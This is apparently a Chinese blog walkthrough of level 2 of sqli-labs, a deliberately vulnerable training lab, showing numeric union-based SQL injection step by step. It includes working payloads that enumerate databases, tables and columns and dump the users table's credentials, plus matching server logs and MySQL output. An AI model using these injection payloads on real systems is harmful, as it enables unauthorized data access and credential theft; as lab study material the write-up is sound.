sqli-labs第二关

先输入' ,报错,说明此处存在漏洞,根据报错信息,此处有三个引号说明这里是接收的是整形数据,或者这里也可以输入 2-1 或者 6-2之类的整形计算,没有报错说明这里可以进行整形计算遂判断这里是整形注入。

http://10.9.0.4/Less-2/?id=1 and 1=1

发现未报错,这里知道我们的数字型注入是不需要进行单引号闭合的,使用order by 1、2、3、4 测试到4的时候报错,证明有3列

http://10.9.0.4/Less-2/?id=1 order by 4

测试回显,发现2,3显示

http://10.9.0.4/Less-2/?id=-1 union select 1,2,3

然后进行爆库名

http://10.9.0.4/Less-2/?id=-1 union select 1,database(),3

查看存在那些数据库

http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata)

接下来是对表名的爆破

http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security')

对列名进行爆破

http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users')

对username和passwd字段进行爆破,0x3a是ASCII编码,转化后是':'

http://10.9.0.4/Less-2/?id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users

执行sql注入对应的数据库日志信息
210219 11:27:49	  250 Connect	[email protected] on 
		  250 Init DB	security
		  250 Query	SELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1
		  250 Quit	
210219 11:28:09	  251 Connect	[email protected] on 
		  251 Init DB	security
		  251 Query	SELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1
		  251 Quit	
210219 11:28:23	  252 Connect	[email protected] on 
		  252 Init DB	security
		  252 Query	SELECT * FROM users WHERE id=-1 union select 1,database(),3 LIMIT 0,1
		  252 Quit	
210219 11:28:33	  253 Connect	[email protected] on 
		  253 Init DB	security
		  253 Query	SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata) LIMIT 0,1
		  253 Quit	
210219 11:28:43	  254 Connect	[email protected] on 
		  254 Init DB	security
		  254 Query	SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1
		  254 Quit	
210219 11:28:51	  255 Connect	[email protected] on 
		  255 Init DB	security
		  255 Query	SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users') LIMIT 0,1
		  255 Quit	
210219 11:29:01	  256 Connect	[email protected] on 
		  256 Init DB	security
		  256 Query	SELECT * FROM users WHERE id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users LIMIT 0,1
		  256 Quit	
注入语句在终端进行查询
mysql> SELECT * FROM users WHERE id=1 order by 3 LIMIT 0,1 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1 ;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> SELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select 1,database(),3 LIMIT 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | security | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata) LIMIT 0,1;
+------+----------+-----------------------------------------------------------------+
| id   | username | password                                                        |
+------+----------+-----------------------------------------------------------------+
| NULL | NULL     | information_schema,challenges,mysql,performance_schema,security |
+------+----------+-----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1;
+------+----------+-------------------------------+
| id   | username | password                      |
+------+----------+-------------------------------+
| NULL | NULL     | emails,referers,uagents,users |
+------+----------+-------------------------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users') LIMIT 0,1;
+------+----------+----------------------+
| id   | username | password             |
+------+----------+----------------------+
| NULL | NULL     | id,username,password |
+------+----------+----------------------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users LIMIT 0,1;
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id   | username | password                                                                                                                                                                                                                   |
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| NULL | NULL     | 1:Dumb:Dumb,2:Angelina:I-kill-you,3:Dummy:[email protected],4:secure:crappy,5:stupid:stupidity,6:superman:genious,7:batman:mob!le,8:admin:admin,9:admin1:admin1,10:admin2:admin2,11:admin3:admin3,12:dhakkan:dumbo,14:admin4:admin4 |
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> 

大概就这些......

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注